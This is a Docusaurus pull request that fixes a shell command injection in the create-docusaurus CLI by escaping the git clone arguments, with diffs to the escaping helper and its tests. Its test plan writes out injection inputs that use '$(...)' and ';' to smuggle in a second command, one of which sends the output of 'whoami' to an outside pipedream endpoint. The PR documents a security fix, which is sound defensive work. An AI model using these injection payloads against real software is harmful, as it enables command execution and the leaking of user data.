### PR TITLE
fix(create-docusaurus): potential security issue with command injection

### DIFF
--- a/packages/create-docusaurus/package.json
+++ b/packages/create-docusaurus/package.json
@@ -23,6 +23,7 @@
   "license": "MIT",
   "dependencies": {
     "@docusaurus/logger": "2.0.0-beta.20",
+    "@docusaurus/utils": "2.0.0-beta.20",
     "commander": "^5.1.0",
     "fs-extra": "^10.1.0",
     "lodash": "^4.17.21",

--- a/packages/create-docusaurus/src/index.ts
+++ b/packages/create-docusaurus/src/index.ts
@@ -13,6 +13,7 @@ import logger from '@docusaurus/logger';
 import shell from 'shelljs';
 import prompts, {type Choice} from 'prompts';
 import supportsColor from 'supports-color';
+import {escapeShellArg} from '@docusaurus/utils';
 
 type CLIOptions = {
   packageManager?: PackageManager;
@@ -463,9 +464,11 @@ export default async function init(
   logger.info('Creating new Docusaurus project...');
 
   if (source.type === 'git') {
-    logger.info`Cloning Git template url=${source.url}...`;
-    const command = await getGitCommand(source.strategy);
-    if (shell.exec(`${command} ${source.url} ${dest}`).code !== 0) {
+    const gitCommand = await getGitCommand(source.strategy);
+    const gitCloneCommand = `${gitCommand} ${escapeShellArg(
+      source.url,
+    )} ${escapeShellArg(dest)}`;
+    if (shell.exec(gitCloneCommand).code !== 0) {
       logger.error`Cloning Git template failed!`;
       process.exit(1);
     }

--- a/packages/docusaurus-utils/src/__tests__/shellUtils.test.ts
+++ b/packages/docusaurus-utils/src/__tests__/shellUtils.test.ts
@@ -9,11 +9,11 @@ import {escapeShellArg} from '../shellUtils';
 
 describe('shellUtils', () => {
   it('escapeShellArg', () => {
-    expect(escapeShellArg('hello')).toBe('hello');
-    expect(escapeShellArg('*')).toBe('"*"');
-    expect(escapeShellArg('hello world')).toBe('"hello world"');
-    expect(escapeShellArg("'hello'")).toBe('"\'hello\'"');
-    expect(escapeShellArg('$(pwd)')).toBe('"$(pwd)"');
-    expect(escapeShellArg('hello$(pwd)')).toBe('"hello$(pwd)"');
+    expect(escapeShellArg('hello')).toBe("'hello'");
+    expect(escapeShellArg('*')).toBe("'*'");
+    expect(escapeShellArg('hello world')).toBe("'hello world'");
+    expect(escapeShellArg("'hello'")).toBe("\\''hello'\\'");
+    expect(escapeShellArg('$(pwd)')).toBe("'$(pwd)'");
+    expect(escapeShellArg('hello$(pwd)')).toBe("'hello$(pwd)'");
   });
 });

--- a/packages/docusaurus-utils/src/__tests__/shellUtils.test.ts
+++ b/packages/docusaurus-utils/src/__tests__/shellUtils.test.ts
@@ -1,0 +1,19 @@
+/**
+ * Copyright (c) Facebook, Inc. and its affiliates.
+ *
+ * This source code is licensed under the MIT license found in the
+ * LICENSE file in the root directory of this source tree.
+ */
+
+import {escapeShellArg} from '../shellUtils';
+
+describe('shellUtils', () => {
+  it('escapeShellArg', () => {
+    expect(escapeShellArg('hello')).toBe('hello');
+    expect(escapeShellArg('*')).toBe('"*"');
+    expect(escapeShellArg('hello world')).toBe('"hello world"');
+    expect(escapeShellArg("'hello'")).toBe('"\'hello\'"');
+    expect(escapeShellArg('$(pwd)')).toBe('"$(pwd)"');
+    expect(escapeShellArg('hello$(pwd)')).toBe('"hello$(pwd)"');
+  });
+});

--- a/packages/docusaurus-utils/src/gitUtils.ts
+++ b/packages/docusaurus-utils/src/gitUtils.ts
@@ -97,22 +97,19 @@ export function getFileCommitDate(
     );
   }
 
-  const formatArg = `--format=%ct${includeAuthor ? ',%an' : ''}`;
+  const args = [
+    `--format=%ct${includeAuthor ? ',%an' : ''}`,
+    '--max-count=1',
+    age === 'oldest' ? '--follow --diff-filter=A' : undefined,
+  ]
+    .filter(Boolean)
+    .join(' ');
 
-  const countArgs = '--max-count=1';
-
-  const oldestArgs = age === 'oldest' ? '--follow --diff-filter=A' : undefined;
-
-  const args = [formatArg, countArgs, oldestArgs].filter(Boolean).join(' ');
-
-  const result = shell.exec(
-    `git log ${args} ${formatArg} -- "${path.basename(file)}"`,
-    {
-      // Setting cwd is important, see: https://github.com/facebook/docusaurus/pull/5048
-      cwd: path.dirname(file),
-      silent: true,
-    },
-  );
+  const result = shell.exec(`git log ${args} -- "${path.basename(file)}"`, {
+    // Setting cwd is important, see: https://github.com/facebook/docusaurus/pull/5048
+    cwd: path.dirname(file),
+    silent: true,
+  });
   if (result.code !== 0) {
     throw new Error(
       `Failed to retrieve the git history for file "${file}" with exit code ${result.code}: ${result.stderr}`,

--- a/packages/docusaurus-utils/src/gitUtils.ts
+++ b/packages/docusaurus-utils/src/gitUtils.ts
@@ -97,20 +97,16 @@ export function getFileCommitDate(
     );
   }
 
-  let formatArg = '--format=%ct';
-  if (includeAuthor) {
-    formatArg += ',%an';
-  }
+  const formatArg = `--format=%ct${includeAuthor ? ',%an' : ''}`;
 
-  let extraArgs = '--max-count=1';
-  if (age === 'oldest') {
-    // --follow is necessary to follow file renames
-    // --diff-filter=A ensures we only get the commit which (A)dded the file
-    extraArgs += ' --follow --diff-filter=A';
-  }
+  const countArgs = '--max-count=1';
+
+  const oldestArgs = age === 'oldest' ? '--follow --diff-filter=A' : undefined;
+
+  const args = [formatArg, countArgs, oldestArgs].filter(Boolean).join(' ');
 
   const result = shell.exec(
-    `git log ${extraArgs} ${formatArg} -- "${path.basename(file)}"`,
+    `git log ${args} ${formatArg} -- "${path.basename(file)}"`,
     {
       // Setting cwd is important, see: https://github.com/facebook/docusaurus/pull/5048
       cwd: path.dirname(file),

--- a/packages/docusaurus-utils/src/index.ts
+++ b/packages/docusaurus-utils/src/index.ts
@@ -96,6 +96,7 @@ export {
   createAbsoluteFilePathMatcher,
 } from './globUtils';
 export {getFileLoaderUtils} from './webpackUtils';
+export {escapeShellArg} from './shellUtils';
 export {
   getDataFilePath,
   getDataFileData,

--- a/packages/docusaurus-utils/src/shellUtils.ts
+++ b/packages/docusaurus-utils/src/shellUtils.ts
@@ -1,0 +1,24 @@
+/**
+ * Copyright (c) Facebook, Inc. and its affiliates.
+ *
+ * This source code is licensed under the MIT license found in the
+ * LICENSE file in the root directory of this source tree.
+ */
+
+// TODO move from shelljs to execa later?
+// Execa is well maintained and widely used
+// Even shelljs recommends execa for security / escaping:
+// https://github.com/shelljs/shelljs/wiki/Security-guidelines
+
+const NO_ESCAPE_REGEXP = /^[\w.-]+$/;
+const DOUBLE_QUOTES_REGEXP = /"/g;
+
+// Inspired from Execa escaping function
+// https://github.com/sindresorhus/execa/blob/main/lib/command.js#L12
+export function escapeShellArg(arg: string): string {
+  if (NO_ESCAPE_REGEXP.test(arg)) {
+    return arg;
+  }
+
+  return `"${arg.replace(DOUBLE_QUOTES_REGEXP, '\\"')}"`;
+}

--- a/packages/docusaurus-utils/src/shellUtils.ts
+++ b/packages/docusaurus-utils/src/shellUtils.ts
@@ -10,15 +10,9 @@
 // Even shelljs recommends execa for security / escaping:
 // https://github.com/shelljs/shelljs/wiki/Security-guidelines
 
-const NO_ESCAPE_REGEXP = /^[\w.-]+$/;
-const DOUBLE_QUOTES_REGEXP = /"/g;
-
-// Inspired from Execa escaping function
-// https://github.com/sindresorhus/execa/blob/main/lib/command.js#L12
-export function escapeShellArg(arg: string): string {
-  if (NO_ESCAPE_REGEXP.test(arg)) {
-    return arg;
-  }
-
-  return `"${arg.replace(DOUBLE_QUOTES_REGEXP, '\\"')}"`;
+// Inspired by https://github.com/xxorax/node-shell-escape/blob/master/shell-escape.js
+export function escapeShellArg(s: string): string {
+  let res = `'${s.replace(/'/g, "'\\''")}'`;
+  res = res.replace(/^(?:'')+/g, '').replace(/\\'''/g, "\\'");
+  return res;
 }

--- a/project-words.txt
+++ b/project-words.txt
@@ -87,6 +87,8 @@ esbuild
 eslintcache
 estree
 evaluable
+execa
+Execa
 externalwaiting
 failfast
 fbid


### PR DESCRIPTION

## Pre-flight checklist

- [x] I have read the [Contributing Guidelines on pull requests](https://github.com/facebook/docusaurus/blob/main/CONTRIBUTING.md#pull-requests).
- [x] **If this is a code change**: I have written unit tests and/or added dogfooding pages to fully verify the new behavior.
- [ ] **If this is a new API or substantial change**: the PR has an accompanying issue (closes #0000) and the maintainers have approved on my working plan.


## Motivation

ShellJS args must be escaped to prevent possible malicious command injections in create-docusaurus

## Test Plan

unit + locally


These 3 should work fine:

```sh
rm -rf website/build/test && yarn create-docusaurus website/build/test https://github.com/slorber/docusaurus-starter
rm -rf website/build/test && yarn create-docusaurus website/build/test 'https://github.com/slorber/docusaurus-starter'
rm -rf website/build/test && yarn create-docusaurus 'website/build/test' 'https://github.com/slorber/docusaurus-starter'
```

But these should not allow executing malicious input:

```sh
rm -rf website/build/test && yarn create-docusaurus 'website/build/test$(say hello)' https://github.com/slorber/docusaurus-starter

rm -rf website/build/test && yarn create-docusaurus website/build/test 'https://en7bf688iy9a.x.pipedream.net/targetName=$(whoami)'

rm -rf website/build/test && yarn create-docusaurus website/build/test 'https://github.com/slorber/docusaurus-starter;say hello'
```

Before the change, all these 3 commands would say hello or send currentUser to the remote endpoint. Now it's fixed.

## Related issues/PRs

We removed Execa here: https://github.com/facebook/docusaurus/pull/5904

I think we should rather migrate from shelljs to execa, because apparently Execa automatically handle such security concerns better (even according to ShellJS security doc: https://github.com/shelljs/shelljs/wiki/Security-guidelines) + it's more used and maintained 